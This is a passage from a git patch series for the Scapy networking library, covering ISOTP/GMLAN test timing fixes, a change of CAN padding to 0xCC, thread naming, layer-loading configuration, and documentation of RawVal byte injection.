sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2, \ - new_can_socket(iface0) as broadcastrcv: + new_can_socket0() as broadcastrcv: print("DisableNormalCommunication") requ = broadcastrcv.sniff(count=1, timeout=2, started_callback=started.set) - pkt = GMLAN(b"\x28") - print(requ) assert len(requ) >= 1 - if bytes(requ[0].data) != b"\xfe\x01" + bytes(pkt): + if bytes(requ[0].data)[0:3] != b"\xfe\x01\x28": ecusimSuccessfullyExecuted = False print("ReportProgrammedState") requ = isotpsock2.sniff(count=1, timeout=2) @@ -921,23 +914,25 @@ def ecusim(): ecusimSuccessfullyExecuted = False ack = GMLAN()/GMLAN_RPSPR(programmedState=0) print("ProgrammingMode requestProgramming") - requ = isotpsock2.sniff(count=1, timeout=2, started_callback=lambda: isotpsock2.send(ack)) + requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN(b"\xe5") print("InitiateProgramming enableProgramming") - requ = isotpsock2.sniff(count=1, timeout=2, started_callback=lambda: isotpsock2.send(ack)) + requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x3) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - assert GMLAN_InitDiagnostics(isotpsock, broadcastsocket=GMLAN_BroadcastSocket(new_can_socket(iface0)), timeout=8, verbose=1) == True + thread.start() + started.wait(timeout=5) + assert GMLAN_InitDiagnostics(isotpsock, + broadcast_socket=GMLAN_BroadcastSocket(new_can_socket0()), + timeout=5, verbose=1) == True thread.join(timeout=5) assert ecusimSuccessfullyExecuted == True @@ -958,10 +953,9 @@ def ecusim(): ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False thread.join(timeout=5) @@ -990,10 +984,10 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False thread.join(timeout=5) @@ -1026,10 +1020,10 @@ def ecusim(): ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False thread.join(timeout=5) @@ -1052,10 +1046,10 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False thread.join(timeout=5) @@ -1079,10 +1073,10 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == True thread.join(timeout=5) @@ -1102,10 +1096,10 @@ def ecusim(): ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == False thread.join(timeout=5) @@ -1131,10 +1125,9 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True thread.join(timeout=5) @@ -1162,10 +1155,9 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True thread.join(timeout=5) @@ -1197,10 +1189,9 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True thread.join(timeout=5) @@ -1221,10 +1212,9 @@ def ecusim(): ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == False thread.join(timeout=5) @@ -1250,9 +1240,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) == payload thread.join(timeout=5) @@ -1270,9 +1260,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None thread.join(timeout=5) @@ -1295,9 +1285,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1, retry=1) == payload thread.join(timeout=5) diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 223f1b412c6..30ebb7059f1 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -233,7 +233,10 @@ assert 0 == send_returncode assert returncode1 == 0 assert returncode2 == 0 - +print(std_out1) +print(std_err1) +print(std_out2) +print(std_err2) expected_output = [b'0x600', b'0x700'] for out in expected_output: assert plain_str(out) in plain_str(std_out1 + std_out2) From 6620501358d189bca7b4d8264d17c376bb0c505c Mon Sep 17 00:00:00 2001 From: Andreas Korb Date: Thu, 19 Nov 2020 16:48:08 +0100 Subject: [PATCH 0404/1632] Change padding value to 0xCC to reduce bit stuffing --- scapy/contrib/isotp.py | 8 ++++---- test/contrib/isotp.uts | 4 ++-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 45a6210fb73..fb10dedd06a 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -1160,7 +1160,7 @@ def __del__(self): def can_send(self, load): if self.padding: - load += bytearray(CAN_MAX_DLEN - len(load)) + load += b"\xCC" * (CAN_MAX_DLEN - len(load)) if self.src_id is None or self.src_id <= 0x7ff: self.can_socket.send(CAN(identifier=self.src_id, data=load)) else: @@ -1626,10 +1626,10 @@ class ISOTPNativeSocket(SuperSocket): def __build_can_isotp_options( self, flags=CAN_ISOTP_DEFAULT_FLAGS, - frame_txtime=0, + frame_txtime=CAN_ISOTP_DEFAULT_FRAME_TXTIME, ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS, - txpad_content=0, - rxpad_content=0, + txpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, + rxpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, rx_ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS): return struct.pack(self.can_isotp_options_fmt, flags, diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 2e126b52945..f05cde8b3b3 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1716,7 +1716,7 @@ with new_can_socket(iface0) as cans: assert(can.data == dhex("30 00 00")) can = cans.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 00 00 00 00 00")) + assert(can.data == dhex("21 07 08 CC CC CC CC CC")) ack_thread.join(timeout=5) @@ -1967,7 +1967,7 @@ with new_can_socket(iface0) as cans: assert(can.data == dhex("30 00 00")) can = cans.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 00 00 00 00 00")) + assert(can.data == dhex("21 07 08 CC CC CC CC CC")) = Receive a padded single frame ISOTP message with padding disabled From be09fa47149034bc216fcb94c412af5be2d04299 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 20 Nov 2020 17:54:30 +0100 Subject: [PATCH 0405/1632] Minor fixes --- scapy/layers/dot11.py | 2 +- scapy/layers/tls/automaton_srv.py | 1 - scapy/tools/UTscapy.py | 18 +++++++++++++++++- test/scapy/layers/dot11.uts | 5 +++-- 4 files changed, 21 insertions(+), 5 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 2cc26b2e429..3a94f84a53b 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1345,7 +1345,7 @@ class Dot11EltHTCapabilities(Dot11Elt): end_tot_size=-4), # ASEL Capabilities: 1B FlagsField("ASEL", 0, 8, [ - "res" + "res", "Transmit_Sounding_PPDUs", "Receive_ASEL", "Antenna_Indices_Feedback", diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 5ad4f6a3e59..1db118a385d 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -770,7 +770,6 @@ def tls13_ADDED_SERVERHELLO(self): if self.cur_session.sid is not None: self.add_record(is_tls12=True) self.add_msg(TLSChangeCipherSpec()) - pass @ATMT.condition(tls13_ADDED_SERVERHELLO) def tls13_should_add_EncryptedExtensions(self): diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index c8a208b362f..e95321ab264 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -18,6 +18,7 @@ import importlib import json import logging +import os import os.path import sys import time @@ -1180,6 +1181,21 @@ def main(): # Delete scapy's test environment vars del os.environ['SCAPY_ROOT_DIR'] + # Print end message + if VERB > 2: + if glob_result == 0: + print(theme.green("UTscapy ended successfully"), file=sys.stderr) + else: + print(theme.red("UTscapy ended with error code %s" % glob_result), + file=sys.stderr) + + # Check active threads + if VERB > 2: + import threading + if threading.active_count() > 1: + print("\nWARNING: UNFINISHED THREADS", file=sys.stderr) + print(threading.enumerate(), file=sys.stderr) + # Return state return glob_result @@ -1190,7 +1206,7 @@ def main(): warnings.resetwarnings() # Let's discover the garbage waste warnings.simplefilter('error') - print("### Warning mode enabled ###") + print("### Warning mode enabled ###", file=sys.stderr) res = main() if cw: res = 1 diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index b75c7c8c7e2..631f57469cb 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -368,12 +368,13 @@ assert f.Receive_NDP == 0 assert f.Transmit_Staggered_Sounding == 1 assert f.Receive_Staggered_Sounding == 1 assert f.Implicit_Transmit_Beamforming_Receiving == 0 -assert f.ASEL.resTransmit_Sounding_PPDUs +assert f.ASEL.res +assert f.ASEL.Transmit_Sounding_PPDUs assert f.ASEL.Receive_ASEL assert f.ASEL.Antenna_Indices_Feedback assert f.ASEL.Explicit_CSI_Feedback assert f.ASEL.Explicit_CSI_Feedback_Based_Transmit_ASEL -assert f.ASEL.Antenna_Selection +assert not f.ASEL.Antenna_Selection assert f.ASEL == 63 = RadioTap - MCS weird padding From c09354817d268c31674549082b9305ece6b1ad66 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 20 Nov 2020 18:39:47 +0100 Subject: [PATCH 0406/1632] Only import tuntap layer on platforms that support it --- scapy/arch/__init__.py | 3 +++ scapy/config.py | 52 +++++++++++++++++++++++++++++++++++------- scapy/layers/all.py | 5 +++- 3 files changed, 51 insertions(+), 9 deletions(-) diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 154767d9c74..50b65cbf64d 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -74,6 +74,9 @@ def get_if_hwaddr(iff): _set_conf_sockets() # Apply config +if LINUX or BSD: + conf.load_layers.append("tuntap") + def get_if_addr6(iff): """ diff --git a/scapy/config.py b/scapy/config.py index bf715d8a646..b98249b79a2 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -798,14 +798,50 @@ class Conf(ConfClass): temp_files = [] # type: List[str] netcache = NetCache() geoip_city = None - # can, tls, http are not loaded by default - load_layers = ['bluetooth', 'bluetooth4LE', 'dhcp', 'dhcp6', 'dns', - 'dot11', 'dot15d4', 'eap', 'gprs', 'hsrp', 'inet', - 'inet6', 'ipsec', 'ir', 'isakmp', 'l2', 'l2tp', - 'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios', - 'netflow', 'ntp', 'ppi', 'ppp', 'pptp', 'radius', 'rip', - 'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'smb2', 'snmp', - 'tftp', 'tuntap', 'vrrp', 'vxlan', 'x509', 'zigbee'] + # can, tls, http and a few others are not loaded by default + load_layers = [ + 'bluetooth', + 'bluetooth4LE', + 'dhcp', + 'dhcp6', + 'dns', + 'dot11', + 'dot15d4', + 'eap', + 'gprs', + 'hsrp', + 'inet', + 'inet6', + 'ipsec', + 'ir', + 'isakmp', + 'l2', + 'l2tp', + 'llmnr', + 'lltd', + 'mgcp', + 'mobileip', + 'netbios', + 'netflow', + 'ntp', + 'ppi', + 'ppp', + 'pptp', + 'radius', + 'rip', + 'rtp', + 'sctp', + 'sixlowpan', + 'skinny', + 'smb', + 'smb2', + 'snmp', + 'tftp', + 'vrrp', + 'vxlan', + 'x509', + 'zigbee' + ] #: a dict which can be used by contrib layers to store local #: configuration contribs = dict() # type: Dict[str, Any] diff --git a/scapy/layers/all.py b/scapy/layers/all.py index 25e7b1e35f0..c387798d622 100644 --- a/scapy/layers/all.py +++ b/scapy/layers/all.py @@ -8,9 +8,12 @@ """ from __future__ import absolute_import -from scapy.config import conf + +# We import conf from arch to make sure arch specific layers are populated +from scapy.arch import conf from scapy.error import log_loading from scapy.main import load_layer + import logging import scapy.modules.six as six From 22ebfbd3acd3297258bd12b32b7a40b1a156e029 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 21 Nov 2020 14:42:45 +0100 Subject: [PATCH 0407/1632] Enable viewsource on RTD --- doc/scapy/conf.py | 1 + 1 file changed, 1 insertion(+) diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 10b521b6a62..8dfe2830302 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -37,6 +37,7 @@ 'sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinx.ext.todo', + 'sphinx.ext.viewcode', 'scapy_doc' ] From 97fe712898e16cd516e301883ba1be6f526a535f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 20 Nov 2020 19:26:34 +0100 Subject: [PATCH 0408/1632] Name all threads in Scapy --- scapy/automaton.py | 19 ++++++++++++++++--- scapy/contrib/isotp.py | 3 ++- scapy/pipetool.py | 4 ++-- scapy/sendrecv.py | 3 ++- 4 files changed, 22 insertions(+), 7 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index a25d427cce7..7a00a36594c 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -100,7 +100,11 @@ def wait_return(self, callback): """Entry point of SelectableObject: register the callback""" if self.check_recv(): return callback(self) - _t = threading.Thread(target=self._wait_non_ressources, args=(callback,)) # noqa: E501 + _t = threading.Thread( + target=self._wait_non_ressources, + args=(callback,), + name="scapy.automaton wait_return" + ) _t.setDaemon(True) _t.start() @@ -180,7 +184,11 @@ def process(self): if not self.remain: return self.results - threading.Thread(target=self._timeout_thread, args=(self.remain,)).start() # noqa: E501 + threading.Thread( + target=self._timeout_thread, + args=(self.remain,), + name="scapy.automaton process" + ).start() if not self._ended: self.available_lock.acquire() return self.results @@ -817,7 +825,12 @@ def _run_condition(self, cond, *args, **kargs): def _do_start(self, *args, **kargs): ready = threading.Event() - _t = threading.Thread(target=self._do_control, args=(ready,) + (args), kwargs=kargs) # noqa: E501 + _t = threading.Thread( + target=self._do_control, + args=(ready,) + (args), + kwargs=kargs, + name="scapy.automaton _do_start" + ) _t.setDaemon(True) _t.start() ready.wait() diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index fb10dedd06a..d1098570da1 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -850,7 +850,8 @@ def schedule(timeout, callback): # Start the scheduling thread if it is not started already if TimeoutScheduler._thread is None: - t = Thread(target=TimeoutScheduler._task) + t = Thread(target=TimeoutScheduler._task, + name="TimeoutScheduler._task") must_interrupt = False TimeoutScheduler._thread = t TimeoutScheduler._event.clear() diff --git a/scapy/pipetool.py b/scapy/pipetool.py index a04015d22cc..9a2f29b0570 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -155,7 +155,7 @@ def run(self): def start(self): if self.thread_lock.acquire(0): - _t = Thread(target=self.run) + _t = Thread(target=self.run, name="scapy.pipetool.PipeEngine") _t.setDaemon(True) _t.start() self.thread = _t @@ -466,7 +466,7 @@ def generate(self): def start(self): self.RUN = True - Thread(target=self.generate).start() + Thread(target=self.generate, name="scapy.pipetool.ThreadGenSource").start() def stop(self): self.RUN = False diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 9c3d9b276a0..d56f8d058de 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -836,7 +836,8 @@ def _setup_thread(self): self.thread = Thread( target=self._run, args=self.args, - kwargs=self.kwargs + kwargs=self.kwargs, + name="AsyncSniffer" ) self.thread.setDaemon(True) From 9d5827f383bc5d0170daa58804392539070aaf15 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 20 Nov 2020 19:30:43 +0100 Subject: [PATCH 0409/1632] Name all threads in tests (except automaton) --- scapy/pipetool.py | 3 ++- test/linux.uts | 6 +++--- test/regression.uts | 4 ++-- test/sendsniff.uts | 30 ++++++++++++++++++++---------- test/tls/tests_tls_netaccess.uts | 6 ++++-- 5 files changed, 31 insertions(+), 18 deletions(-) diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 9a2f29b0570..d37ec60a3cd 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -466,7 +466,8 @@ def generate(self): def start(self): self.RUN = True - Thread(target=self.generate, name="scapy.pipetool.ThreadGenSource").start() + Thread(target=self.generate, + name="scapy.pipetool.ThreadGenSource").start() def stop(self): self.RUN = False diff --git a/test/linux.uts b/test/linux.uts index 86e015ae09f..4b56e418390 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -189,7 +189,7 @@ try: started_callback=_sniffer_started) global frm_count frm_count = 2 - t_sniffer = Thread(target=_sniffer) + t_sniffer = Thread(target=_sniffer, name="linux.uts sniff veth_scapy_1") t_sniffer.start() cond_started.wait() sendp(Ether(type=0xbeef)/Raw(b'0123456789'), @@ -247,7 +247,7 @@ def _sniffer(): global frm_count frm_count = 2 -t_sniffer = Thread(target=_sniffer) +t_sniffer = Thread(target=_sniffer, name="linux.uts sniff veth_scapy_1 2") t_sniffer.start() cond_started.wait() sendp(Ether(type=0xbeef)/Raw(b'0123456789'), @@ -349,7 +349,7 @@ def _sniffer(): global dot1q_count dot1q_count = len(sniffed) -t_sniffer = Thread(target=_sniffer) +t_sniffer = Thread(target=_sniffer, name="linux.uts sniff right0") t_sniffer.start() cond_started.wait() sendp(Ether()/IP(dst="198.51.100.2")/ICMP(), iface='vlanleft0', count=2) diff --git a/test/regression.uts b/test/regression.uts index 3a0730e374e..0ad81bfba43 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1715,8 +1715,8 @@ def send_and_sniff(pkt, timeout=2, flt=None, opened_socket=None): _send_or_sniff(pkt, timeout, flt, pid, False, t_other=thread, opened_socket=opened_socket) results.put(True) results = Queue() - t_parent = Thread(target=run_function, args=(pkt, timeout, flt, 0, None, results, None)) - t_child = Thread(target=run_function, args=(pkt, timeout, flt, 1, t_parent, results, opened_socket)) + t_parent = Thread(target=run_function, args=(pkt, timeout, flt, 0, None, results, None), name="send_and_sniff 1") + t_child = Thread(target=run_function, args=(pkt, timeout, flt, 1, t_parent, results, opened_socket), name="send_and_sniff 2") t_parent.start() t_child.start() t_parent.join() diff --git a/test/sendsniff.uts b/test/sendsniff.uts index f7ebb1428eb..07eed036973 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -27,7 +27,8 @@ else: t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"} + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests sniff 1" ) t_sniff.start() @@ -35,7 +36,8 @@ t_sniff.start() * It will terminate when 5 IP packets from 192.0.2.1 have been forwarded t_bridge = Thread(target=bridge_and_sniff, args=(tap0, tap1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests bridge_and_sniff 1") t_bridge.start() = Send five IP packets from 192.0.2.1 to the tap0 **interface** @@ -54,7 +56,8 @@ assert not t_sniff.is_alive() t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"} + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, + name="tests sniff 2" ) t_sniff.start() @@ -70,7 +73,8 @@ def nat_1_2(pkt): t_bridge = Thread(target=bridge_and_sniff, args=(tap0, tap1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": nat_1_2, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests bridge_and_sniff 2") t_bridge.start() = Send five IP packets from 192.0.2.1 to the tap0 **interface** @@ -126,7 +130,8 @@ time.sleep(10) t_sniff = Thread( target=sniff, kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"} + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests sniff 3") ) t_sniff.start() @@ -135,7 +140,8 @@ t_sniff.start() t_bridge = Thread(target=bridge_and_sniff, args=(tun0, tun1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": lambda pkt: pkt, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests bridge_and_sniff 3") t_bridge.start() = Send five IP packets from 192.0.2.1 to the tun0 **interface** @@ -155,7 +161,8 @@ assert not t_sniff.is_alive() t_sniff = Thread( target=sniff, kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"} + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, + name="tests sniff 4") ) t_sniff.start() @@ -171,7 +178,8 @@ def nat_1_2(pkt): t_bridge = Thread(target=bridge_and_sniff, args=(tun0, tun1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": nat_1_2, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + name="tests bridge_and_sniff 4") t_bridge.start() = Send five IP packets from 192.0.2.1 to the tun0 **interface** @@ -224,7 +232,8 @@ with VEthPair('a_0', 'a_1') as veth_0: 'xfrm21': xfrm_x, 'store': False, 'count': 4, - 'lfilter': lambda p: Ether in p and p[Ether].type == 0xbeef}) + 'lfilter': lambda p: Ether in p and p[Ether].type == 0xbeef}, + name="tests bridge_and_sniff VEthPair") t_bridge.start() time.sleep(1) # send frames in both directions @@ -291,7 +300,8 @@ def answer_arp_leak(pkt): t_answer = Thread( target=sniff, kwargs={"prn": answer_arp_leak, "timeout": 10, "store": False, - "opened_socket": tap0} + "opened_socket": tap0}, + name="tests answer_arp_leak" ) t_answer.start() diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 0ac3ef9323e..cd7c4d27f48 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -148,7 +148,8 @@ def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=No # Run server q_ = Queue() th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), - kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}) + kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}, + name="test_tls_server %s %s" % (suite, version)) th_.setDaemon(True) th_.start() # Synchronise threads @@ -256,7 +257,8 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, print("Starting server...") th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), kwargs={"curve": None, "cookie": False, "client_auth": client_auth, - "handle_session_ticket": sess_in_out}) + "handle_session_ticket": sess_in_out}, + name="test_tls_client %s %s" % (suite, version)) th_.setDaemon(True) th_.start() # Synchronise threads From 498fff9b1fc69b025dc1ec2defa883b85709ed66 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 20 Nov 2020 12:16:14 +0100 Subject: [PATCH 0410/1632] RawVal: fix, document, cleanup --- doc/scapy/usage.rst | 13 ++++++++ scapy/compat.py | 6 ++-- scapy/contrib/http2.py | 4 +-- scapy/contrib/icmp_extensions.py | 4 +-- scapy/fields.py | 51 +++++++++++++++++++++++++++++--- scapy/layers/http.py | 2 +- scapy/packet.py | 28 +++--------------- test/regression.uts | 9 ++++++ 8 files changed, 81 insertions(+), 36 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index af4c7de674e..b00523e7818 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -270,6 +270,19 @@ The function fuzz() is able to change any default value that is not to be calcul ................^C Sent 16 packets. +Injecting bytes +--------------- + +.. index:: + single: RawVal + +In a packet, each field has a specific type. For instance, the length field of the IP packet ``len`` expects an integer. More on that later. If you're developping a PoC, there are times where you'll want to inject some value that doesn't fit that type. This is possible using ``RawVal`` + +.. code:: + + >>> pkt = IP(len=RawVal(b"NotAnInteger"), src="127.0.0.1") + >>> bytes(pkt) + b'H\x00NotAnInt\x0f\xb3er\x00\x01\x00\x00@\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00' Send and receive packets (sr) ----------------------------- diff --git a/scapy/compat.py b/scapy/compat.py index a8b6d60aeed..29a767b851f 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -211,7 +211,7 @@ def lambda_tuple_converter(func): # This is ugly, but we don't want to move raw() out of compat.py # and it makes it much clearer if TYPE_CHECKING: - from scapy.packet import Packet, RawVal + from scapy.packet import Packet if six.PY2: @@ -225,7 +225,7 @@ def chb(x): return chr(x) def raw(x): - # type: (Union[Packet, RawVal]) -> bytes + # type: (Union[Packet]) -> bytes """ Builds a packet and returns its bytes representation. This function is and will always be cross-version compatible @@ -235,7 +235,7 @@ def raw(x): return bytes(x) else: def raw(x): - # type: (Union[Packet, RawVal]) -> bytes + # type: (Union[Packet]) -> bytes """ Builds a packet and returns its bytes representation. This function is and will always be cross-version compatible diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 43e83ff0382..cf93e241349 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -1324,14 +1324,14 @@ def guess_payload_class(self, payload): # underlayer packet return config.conf.padding_layer - def self_build(self, field_pos_list=None): + def self_build(self, **kwargs): # type: (Any) -> str """self_build is overridden because type and len are determined at build time, based on the "data" field internal type """ if self.getfieldval('type') is None: 